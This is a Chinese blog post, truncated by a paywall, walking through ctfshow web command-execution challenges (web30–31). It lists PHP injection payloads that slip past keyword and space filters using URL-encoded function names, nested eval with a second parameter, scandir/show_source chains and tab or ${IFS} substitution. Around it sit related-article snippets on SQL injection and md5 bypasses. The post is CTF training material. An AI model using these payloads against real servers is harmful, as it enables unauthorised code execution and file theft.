ctfshow-web-命令执行,网络安全开发的基础知识

最新推荐文章于 2024-10-10 20:59:20 发布
最新推荐文章于 2024-10-10 20:59:20 发布
阅读量689 收藏 27
点赞数 27
分类专栏: 2024年程序员学习 文章标签: 前端 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_83739727/article/details/137348735
版权
本文探讨了CTF比赛中关于Web安全的命令执行漏洞,包括如何绕过过滤机制,如通过URL编码、嵌套函数和特殊字符来执行命令。此外,还分享了作者的网络安全学习资源和实践经验,提供了一套网络安全学习路线图、工具箱、项目实战和面试题,旨在帮助读者系统地提升网络安全技能。
摘要由CSDN通过智能技术生成

过滤了php、flag、system
补充打印文件命令?c=echo%20nl%20fl%27%27ag.p%27%27hp;
3. web31
preg_match(“/flag|system|php|cat|sort|shell|.| |'/i”, $c)
其他的过滤了无所谓,但过滤了.和空格

①其实就是highlight_file(flag.php);的url编码,适用php7
?c=(%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(%99%93%9E%98%D1%8F%97%8F);

②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入
?c=eval($_GET[a]);&a=system(‘cat flag.php’);

③用函数绕
?c=show_source(next(array_reverse(scandir(pos(localeconv())))));
?c=show_source(scandir(getcwd())[2]);

localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."
pos():输出数组第一个元素,不改变指针
scandir():遍历目录,这里因为参数为"."所以遍历当前目录
array_reverse():元组倒置
next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以
show_source():查看源码
getcwd():获取当前工作目录

④绕空格
?c=passthru(“tac%09fla*”);
?c=passthru(“tac${IFS}$9fla*”);
中间拼接用%0

最低0.47元/天 解锁文章
2401_83739727
关注
专栏目录
ctfshow-web入门-命令执行-web31
HkD01L的博客
06-24 928
ctfshow,命令执行web31
命令执行web31
DJmutu的博客
12-04 370
让c取值,c取值a,$_GET可以让a取值来覆盖c的取值,用&来连接a的取值,在a中使用命令执行。这一题过滤内容有增加了,部分函数还不要紧,主要是过滤了 . 空格 ` 这三种关键字,嵌套eval可以取一个新的值来覆盖c的值,从而绕过滤内容,实操。以上就是在本题中学到的新姿势,每天学习,每天苕皮吃到饱!还有很多其他的命令我就不一一列举了。
CTFshow 命令执行 web29 30 31
ChenD的学习笔记
11-08 1651
CTFshow 命令执行 web29 web30 web31
《CTFshow-Web入门》04. Web 31~40
学习学习学习......
12-03 1052
eval() 利用与正则绕过,PHP 伪协议、include() 利用。
2024年网安最全ctfshow-web-命令执行
2401_84264610的博客
05-01 170
①直接执行系统命令???”);???②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(
ctfshow-web-命令执行,零基础学网络安全开发
m0_60666452的博客
04-05 931
其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入?③用函数绕??localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."pos():输出数组第一个元素,不改变指针scandir():遍历目录,这里因为参数为"."所以遍历当前目录array_reverse():元组倒置。
CTFShow-WEB入门篇命令执行详细Wp(29-40)_ctfshow-web入门篇详细wp
2401_84264096的博客
05-02 758
?#然后访问1.txtif(!eval(c);}else{??if(!}else{?}else{php://filter/read=convert.base64-encode/resource=flag.php #伪协议?if(!
ctfshow-web-命令执行
2401_86043875的博客
08-27 808
②内敛执行??c=echo;③利用参数输入+eval?④利用参数输入+include+伪协议(不用括号、分号)?2. web30过滤了php、flag、system补充打印文件命令?c=echo%20;3. web31其他的过滤了无所谓,但过滤了.和空格①其实就是highlight_file(flag.php);的url编码,适用php7?c=(②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入?
ctfshow-web-命令执行(2)
2401_84297899的博客
04-28 167
localeconv():返回包含本地化数字和货币格式信息的关联数组,这里主要是返回数组第一个"."next():将数组指针指向下一个,这里可以省略倒置和改变数组指针,直接利用[2]取出数组也可以。②通过嵌套eval函数来获取另一个参数的的方法来绕过,不会判断其他参数的传入。scandir():遍历目录,这里因为参数为"."所以遍历当前目录。pos():输出数组第一个元素,不改变指针。array_reverse():元组倒置。show_source():查看源码。getcwd():获取当前工作目录。
2024年网安最新ctfshow-WEB-web6_ctf(1)
2401_84297899的博客
05-03 1037
ctf.show WEB模块第6关是一个SQL注入漏洞,注入点是单引号字符型注入,并且过滤了空格,我们可以使用括号()或者注释/**/绕过先来一个万能账号,注意使用括号()替换空格,用户名输入以下payload,密码随便输成功登录既然是SQL注入漏洞,那么flag肯定就藏在当前使用的数据库中,我们使用获取当前使用的数据库,用户名输入以下payload,密码随便输当前数据库是web2。
2024年网络安全最全ctfshow-WEB-web5_ctfshow web5
2401_84281698的博客
05-03 547
ctf.show WEB模块第5关需要传递两个参数,一个字符串,一个数字,并且两个参数的md5值必须相同,我们可以利用md5的0e漏洞进行绕过0e绕过是指:0e开头的字符串在参与弱类型比较时,会被当做科学计数法,结果转换为0;我们只要传入两个md5值是以0e开头的参数,即可绕过md5加密,夺取flag页面中展示了部分源码,从源码中我们可以得知,想要夺旗需要通过GET请求传递两个参数v1和v2,并且参数v1必须是纯字母字符串,参数v2必须是数字或者数字字符串,并且两个参数的md5值必须相等。
2024年网络安全最新ctfshow-web-信息收集
2301_79985178的博客
05-03 734
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料。
2024年最新ctfshow-WEB-web9( MD5加密漏洞绕过)_ctfshow web9(1),网络安全架构师必备框架技能核心笔记
2401_84301227的博客
05-06 749
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。
【Vue】a-radio-group单选框数字与字符串回显问题
叶为正的博客
10-08 248
根据后端接口返回数字或字符串,来配置Ant Design of Vue中a-radio-group单选框的回显问题,注意value中的取值是不一样的。
web扩展
最新发布
x737510的博客
10-10 415
HTTP(Hypertext Transfer Protocol)协议中的它们在用途和使用方式上有一些区别。用于请求服务器上的资源,通常是获取数据。GET 请求是幂等的,多次请求返回的结果应该是相同的,而且不应该对服务器产生任何副作用。用于向服务器提交数据,通常是提交表单数据或上传文件等。POST 请求可能对服务器产生副作用,例如在数据库中创建新的资源。数据通过 URL 参数传递,附在 URL 后面。因为数据在 URL 中可见,所以不适合传递敏感信息,且有长度限制。
前端基础面试题·第四篇——Vue(其二)
2301_76380626的博客
10-08 1025
路由跳转 接收参数 params传递参数可以用过页面路由对象route的params属性访问到。 2.query传参 query 传参是通过URL的查询字符串来传递参数,这种方式传递的参数是可选的。 这种方式不需要提前配置路由路径,直接在路由跳转时在路径或者配置中传递参数即可。 路由跳转 接收参数 这种方式传递的参数会挂载到页面路由对象route的query对象上。 2. hash和history路由区别 hash路由地址上在路径后面带#号,history路由地址上不带#号. 在
前端的全栈混合之路Meteor篇(四):支持自定义对象序列化的EJSON介绍
分享有趣的、贴近生活的CS知识
10-07 911
在Meteor框架中,EJSON(Extended JSON)是一个扩展了标准JSON的库,旨在支持更多的数据类型。标准JSON仅支持字符串、数字、布尔值、数组和对象等基本数据类型,而EJSON允许开发者在Meteor应用中传输更复杂的数据类型,例如DateBinary数据,甚至是自定义对象,这使得Meteor在客户端和服务器之间传递复杂数据变得更加便捷和高效。
快餐食品检测系统源码分享[一条龙教学YOLOV8标注好的数据集一键训练_70+全套改进创新点发刊_Web前端展示]
m0_73388125的博客
10-08 1362
数据集信息展示在本研究中,我们使用了名为“burger detection”的数据集,以改进YOLOv8在快餐食品检测系统中的表现。该数据集专门针对快餐食品的多样性进行设计,涵盖了六个主要类别,分别是:bbq、bread、bun、hotdog、pattty和patty。这些类别的选择不仅反映了快餐食品的常见种类,还考虑到了它们在实际应用中的重要性,尤其是在餐饮行业的食品识别和分类任务中。数据集的构建过程经过精心设计,确保每个类别的样本数量和质量都能满足深度学习模型训练的需求。
ctfshow-web-web红包题
07-14
ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值